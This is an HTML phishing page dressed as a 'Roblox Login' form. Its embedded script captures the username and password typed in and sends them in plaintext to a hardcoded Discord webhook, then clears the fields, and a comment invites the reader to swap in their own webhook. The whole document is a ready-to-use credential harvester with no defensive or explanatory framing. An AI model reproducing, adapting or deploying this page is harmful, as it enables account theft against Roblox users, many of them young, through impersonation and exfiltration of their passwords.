<!DOCTYPE html>
<html>
<head>
  <title>Roblox Login</title>
  <style>
    body {
      background-color: #f1f1f1;
    }

    #login-form {
      width: 300px;
      margin: 50px auto;
      background-color: #fff;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
    }

    input[type=text], input[type=password] {
      width: 100%;
      padding: 10px;
      margin: 5px 0;
      display: inline-block;
      border: 1px solid #ccc;
      border-radius: 4px;
      box-sizing: border-box;
    }

    button {
      background-color: #4CAF50;
      color: white;
      padding: 10px 20px;
      margin: 8px 0;
      border: none;
      border-radius: 4px;
      cursor: pointer;
    }

    button:hover {
      background-color: #45a049;
    }
  </style>
</head>
<body>
  <form id="login-form">
    <label for="username">Username:</label>
    <input type="text" id="username" name="username" required>

    <label for="password">Password:</label>
    <input type="password" id="password" name="password" required>

    <button type="submit">Login</button>
  </form>

  <script>
    const loginForm = document.getElementById('login-form');
    const usernameInput = document.getElementById('username');
    const passwordInput = document.getElementById('password');
    const webhookUrl = 'https://discord.com/api/webhooks/1097478637286084709/sV8SLcLyNifGeHSdFNWAuxedG2K-BXhXtZgQqWUoLNW-dMHD7gAoMskg1I0f5jGsW6_x'; // Replace with your own webhook URL

    loginForm.addEventListener('submit', (event) => {
      event.preventDefault(); // Prevent the form from submitting
      const username = usernameInput.value;
      const password = passwordInput.value;
      sendToWebhook(username, password); // Send the login information to the webhook
      usernameInput.value = ''; // Clear the username input field
      passwordInput.value = ''; // Clear the password input field
    });

    function sendToWebhook(username, password) {
      fetch(webhookUrl, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          content: `Login attempt with username ${username} and password ${password}`
        })
      })
      .then(response => {
        console.log(response);
      })
      .catch(error => {
        console.error(error);
      });
    }
  </script>
</body>
</html>
